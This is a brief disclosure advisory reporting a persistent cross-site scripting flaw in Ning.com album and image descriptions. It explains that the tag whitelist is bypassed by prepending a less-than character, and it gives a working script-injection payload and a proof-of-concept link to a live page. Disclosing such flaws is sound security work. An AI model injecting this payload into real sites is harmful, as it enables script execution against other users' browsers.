|=================================================================================================|
|      ___           ___           ___                       ___           ___           ___      |
|     /\  \         /\  \         /\__\          ___        /\  \         /\  \         /\  \     |
|    /::\  \       /::\  \       /::|  |        /\  \      /::\  \       /::\  \       /::\  \    |
|   /:/\:\  \     /:/\:\  \     /:|:|  |        \:\  \    /:/\:\  \     /:/\:\  \     /:/\:\  \   |
|  /:/  \:\  \   /:/  \:\  \   /:/|:|  |__      /::\__\  /::\~\:\  \   /::\~\:\  \   /::\~\:\  \  |
| /:/__/ \:\__\ /:/__/ \:\__\ /:/ |:| /\__\  __/:/\/__/ /:/\:\ \:\__\ /:/\:\ \:\__\ /:/\:\ \:\__\ |
| \:\  \  \/__/ \:\  \ /:/  / \/__|:|/:/  / /\/:/  /    \/__\:\ \/__/ \:\~\:\ \/__/ \/_|::\/:/  / |
|  \:\  \        \:\  /:/  /      |:/:/  /  \::/__/          \:\__\    \:\ \:\__\      |:|::/  /  |
|   \:\  \        \:\/:/  /       |::/  /    \:\__\           \/__/     \:\ \/__/      |:|\/__/   |
|    \:\__\        \::/  /        /:/  /      \/__/                      \:\__\        |:|  |     |
|     \/__/         \/__/         \/__/                                   \/__/         \|__|     |
|                                                                                                 |
|=================================================================================================|
|                                                                                                 |
| Vulnerability............Persistent XSS                                                         |
| Software.................Ning.com                                                               |
| Date.....................4/26/10                                                                |
| Site.....................http://cross-site-scripting.blogspot.com/                              |
|                                                                                                 |
|=================================================================================================|
|                                                                                                 |
| ##Description##                                                                                 |
|                                                                                                 |
| Less than and greater than characters submitted in the descriptions of albums, images and       |
| probably others are unencoded. Any tags submitted in such fields are subjected to whitelist     |
| validation, but this can be bypassed by prepending a less than character to the injected open   |
| and close tags.                                                                                 |
|                                                                                                 |
|                                                                                                 |
| ##Exploit##                                                                                     |
|                                                                                                 |
| <<script>alert(0)//<</script>                                                                   |
|                                                                                                 |
|                                                                                                 |
| ##Proof of Concept##                                                                            |
|                                                                                                 |
| http://coniferous.ning.com/photo/792231134-1                                                    |
|                                                                                                 |
|=================================================================================================|